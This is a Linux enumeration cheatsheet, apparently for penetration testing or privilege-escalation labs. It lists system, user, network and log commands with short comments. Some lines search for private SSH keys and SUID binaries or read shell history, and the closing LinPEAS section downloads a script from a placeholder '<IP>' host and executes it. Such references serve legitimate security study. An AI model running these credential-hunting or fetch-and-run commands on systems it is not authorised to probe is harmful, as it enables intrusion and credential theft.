Linux basic enumeration cheatsheet:
System info:
hostname # Show the hostname of the machine
uname -a # Display kernel and system information
cat /etc/os-release # Identify the Linux distribution and version
id # Show current user ID and group memberships
whoami # Print the current username
pwd # Show the current working directory
Users and groups:
cat /etc/passwd # List local user accounts
cat /etc/group # List local groups
last # Show recent login history
w # Display logged-in users and their activity
sudo -l # Show allowed sudo commands for the current user
Interesting files:
find / -type f -name "*.conf" 2>/dev/null | head # Find configuration files and show first results
find / -perm -4000 2>/dev/null # Find SUID binaries
find / -writable -type d 2>/dev/null # Find writable directories
find / -name id_rsa 2>/dev/null # Search for private SSH keys with the default RSA file name
find / -name authorized_keys 2>/dev/null # Search for authorized SSH keys
Processes and services:
ps aux # List running processes
ss -tulpn # Show listening TCP/UDP ports and processes
netstat -tulpn # Another way to list ports and services
systemctl list-units --type=service # List active systemd services
Scheduled tasks:
crontab -l # Show current user's cron jobs
ls -la /etc/cron* # List system-wide cron directories and files
cat /etc/crontab # View the main system crontab
Environment and history:
env # Print environment variables
history # Show current shell command history
cat ~/.bash_history # Read bash history file manually
Network:
ip a # Show network interfaces and IP addresses
ip r # Show routing table
arp -a # Show ARP cache entries
cat /etc/hosts # View local hostname mappings
cat /etc/resolv.conf # View configured DNS servers
Permissions and sudo:
sudo -l # Check sudo permissions
sudo --version # Print sudo version
getcap -r / 2>/dev/null # Find binaries with Linux capabilities
ls -la /home # List home directories and permissions
Logs:
journalctl # View systemd journal logs
journalctl -xe # View recent logs with extra detail
cat /var/log/auth.log # Read auth logs on Debian-based systems
cat /var/log/syslog # Read general logs on Debian-based systems
Installed software:
dpkg -l # List installed packages on Debian-based systems
rpm -qa # List installed packages on RPM-based systems
snap list # List installed snap packages
Quick manual privilege escalation (PE) checks:
find / -perm -4000 2>/dev/null # Look for SUID binaries
getcap -r / 2>/dev/null # Look for binaries with special capabilities
LinPEAS:
curl http://<IP>/linpeas.sh --output linpeas.sh # Download linpeas.sh from the hosting server
chmod +x linpeas.sh # Make it executable
./linpeas.sh # Run the LinPEAS enumeration tool
